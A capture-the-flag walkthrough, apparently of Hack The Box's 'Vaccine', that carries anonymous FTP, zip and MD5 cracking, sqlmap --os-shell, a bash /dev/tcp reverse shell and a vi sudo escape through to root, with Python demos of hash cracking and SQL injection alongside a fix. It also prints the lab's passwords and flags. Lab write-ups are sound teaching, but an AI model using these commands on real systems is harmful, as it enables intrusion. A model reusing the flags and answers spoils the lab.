Vaccine
Initial Scan
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine

Task 1
Besides SSH and HTTP, what other service is hosted on this box?
Answer: FTP
Task 2
This service can be configured to allow login with any password for a specific username. What is that username?
Answer: anonymous
Task 3
What is the name of the file downloaded over this service?
ftp 10.129.248.153

Log in as anonymous with any password, list the directory and download the archive with get backup.zip.
Answer: backup.zip
Task 4
What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format that allows cracking attempts?

Run it against backup.zip, redirect the output to a file and feed that file to john with the rockyou wordlist; john recovers the archive password.
Answer: zip2john
Task 5
What is the password for the admin user on the website?

backup.zip password: 41852963

Extracting the archive with that password gives the site source. index.html contains the admin login check, which compares the submitted password against a hard-coded MD5 hash.

Put the hash in a file and crack it with hashcat (-a 0 is a straight dictionary attack, -m 0 is raw MD5):
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Answer: qwerty789
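What the hashcat step above actually does, as an added Python example (not part of this walkthrough and not the box's files): pull every 32-hex-digit token out of a page the way you would eyeball index.html, then run a straight-mode dictionary attack against it. The HTML snippet and the wordlist are constructed stand-ins; the digest in the snippet is generated from "qwerty" so the sample is self-consistent, whereas on the target it is a literal in the page source.

```python
"""Added example (not from the walkthrough): `hashcat -a 0 -m 0 hash wordlist`
done by hand so the mechanics are visible.  The HTML and wordlist below are
constructed stand-ins, not the box's real index.html or rockyou.txt."""
import hashlib
import re
from typing import Iterable, Optional, Union

Word = Union[str, bytes]


def md5_hex(word: Word) -> str:
    """Hex MD5 of a candidate, hashing raw bytes exactly as hashcat mode 0 does."""
    data = word.encode("utf-8") if isinstance(word, str) else word
    return hashlib.md5(data).hexdigest()


# Constructed stand-in for the login check leaked in index.html.  The real page
# embeds the digest as a literal; here it is generated (md5 of "qwerty").
SAMPLE_INDEX_HTML = """<?php
  // constructed sample, not the target's source
  if ($_POST['username'] == 'admin' && md5($_POST['password']) == '__DIGEST__') {
    header('Location: dashboard.php');
  }
?>""".replace("__DIGEST__", md5_hex("qwerty"))

# Constructed rockyou-style wordlist; order only affects how soon a hit appears.
SAMPLE_WORDLIST = ["123456", "password", "letmein", "qwerty", "dragon"]

# A 32-hex-digit token not glued to other hex digits (avoids matching inside
# longer hashes such as SHA-256).
HEX32 = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")


def find_md5_candidates(text: str) -> list:
    """Every MD5-shaped token in a page, lowercased, in first-seen order."""
    seen: dict = {}
    for m in HEX32.finditer(text):
        seen.setdefault(m.group(0).lower(), None)
    return list(seen)


def crack_md5(target_hex: str, wordlist: Iterable[Word]) -> Optional[Word]:
    """Straight mode (-a 0): hash each candidate as-is and compare to the target."""
    target = target_hex.lower()
    for cand in wordlist:
        # Strip the line terminator a wordlist file carries, nothing else:
        # leading/trailing spaces inside a password are significant.
        cand = cand.rstrip(b"\r\n") if isinstance(cand, bytes) else cand.rstrip("\r\n")
        if md5_hex(cand) == target:
            return cand
    return None


def crack_from_html(html: str, wordlist: list) -> dict:
    """Task 5 end to end: extract the digest(s) from the page, crack each one."""
    return {h: crack_md5(h, wordlist) for h in find_md5_candidates(html)}


def load_wordlist(path: str) -> list:
    """rockyou.txt is not valid UTF-8 throughout; read bytes and hash bytes,
    which is also what hashcat does."""
    with open(path, "rb") as fh:
        return fh.read().split(b"\n")


if __name__ == "__main__":
    # Swap SAMPLE_WORDLIST for load_wordlist("/usr/share/wordlists/rockyou.txt")
    # and SAMPLE_INDEX_HTML for the real file contents to reproduce the step.
    print(crack_from_html(SAMPLE_INDEX_HTML, SAMPLE_WORDLIST))
```

Hashing bytes rather than decoded text matters with rockyou: several lines are not valid UTF-8, and decoding them would silently change (or drop) candidates that hashcat would have tried.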
Task 6
What option can be passed to sqlmap to try to get command execution via the SQL injection?
Looking at sqlmap -h, it is listed under the operating system access options.

Answer: --os-shell
Task 7
What program can the postgres user run as root using sudo?
Log in as admin and copy the PHPSESSID cookie from the browser: dashboard.php only answers to an authenticated session, so sqlmap needs the cookie to reach the injectable search parameter.

sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
This gives a command shell as the postgres user, the account the database server runs under.

Start a listener on port 443 and run the following from the os-shell to get an interactive reverse shell:
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"

sudo -l (it prompts for the postgres password, which Task 9 recovers from dashboard.php) shows that vi can be run as root.
Answer: vi
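Why the search parameter is injectable and how sqlmap confirms it before escalating to --os-shell, as an added Python example that is not part of this walkthrough. It runs against an in-memory SQLite table with constructed rows; the real backend is PostgreSQL, and the vulnerable/fixed pair mirrors the PHP pattern of pasting the GET parameter into the query text versus binding it as a parameter. The boolean probe reproduces sqlmap's boolean-based detection; the stacked-query check shows the precondition --os-shell needs.

```python
"""Added example (not from the walkthrough): the injectable search pattern, its
parameterised fix, sqlmap's boolean-based probe, and the stacked-query check
that --os-shell depends on.  SQLite stands in for PostgreSQL; rows are made up."""
import sqlite3
from typing import Callable, List, Tuple

# Constructed stand-in for the table the dashboard searches.
ROWS = [("Elixir", "Sports"), ("Sandy", "Sedan"), ("Meta", "SUV")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (name TEXT, type TEXT)")
    conn.executemany("INSERT INTO cars VALUES (?, ?)", ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    """Same shape as the PHP page: the parameter is spliced into the SQL text,
    so a quote in `term` closes the literal and the remainder is parsed as SQL."""
    sql = f"SELECT name, type FROM cars WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    """Fix: bind the value.  The driver ships it separately from the statement,
    so quotes and comment markers inside it are only ever data."""
    sql = "SELECT name, type FROM cars WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def boolean_probe(search: Callable[[str], list], base: str = "Sandy") -> bool:
    """sqlmap-style boolean-based check: append a tautology and a contradiction
    to a known-good value.  If the TRUE variant matches the baseline and the
    FALSE variant differs, the input reached the SQL parser."""
    baseline = search(base)
    true_case = search(base + "' AND '1'='1' --")
    false_case = search(base + "' AND '1'='2' --")
    return baseline == true_case and true_case != false_case


def stacked_queries_accepted(conn: sqlite3.Connection) -> bool:
    """--os-shell needs stacked statements: on PostgreSQL sqlmap appends its own
    statements (creating a command-execution helper function) after a `;`.
    PHP's pg_query() runs stacked statements; Python's sqlite3 refuses them,
    which is why this demo stops at data extraction."""
    try:
        conn.execute("SELECT 1; SELECT 2")
        return True
    except Exception:  # sqlite3 raises Warning or ProgrammingError depending on version
        return False


if __name__ == "__main__":
    db = make_db()
    print("dump via ' OR '1'='1:", search_vulnerable(db, "' OR '1'='1"))
    print("same input, bound   :", search_safe(db, "' OR '1'='1"))
    print("probe (vulnerable)  :", boolean_probe(lambda t: search_vulnerable(db, t)))
    print("probe (fixed)       :", boolean_probe(lambda t: search_safe(db, t)))
    print("stacked queries     :", stacked_queries_accepted(db))
```

The probe is the reason sqlmap can report an injection without ever seeing an error message: it only needs two responses that differ in a way the attacker controls. On PostgreSQL the same stacked-query capability that lets sqlmap load a helper function also lets a superuser run COPY ... FROM PROGRAM, so the shell lands as the database's OS user, here postgres.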
Task 8
Submit user flag


Answer: ec9b13ca4d6229cd5cc1e09980965bf7
Task 9
Submit root flag
The site is PHP, so look through /var/www/html for hard-coded credentials. dashboard.php holds the database connection string:

user=postgres password=P@s5w0rd!

That password is what sudo asks for. Looking at the options on GTFOBins: the sudo rule only allows vi on one specific file, so open that file with sudo vi and use the vi escape to get a root shell, first setting the shell option and then spawning it:
:set shell=/bin/sh
ENTER
:shell
ENTER

The shell that opens runs as root.

Answer: dd6e058e814260bc70e9bbdef2715849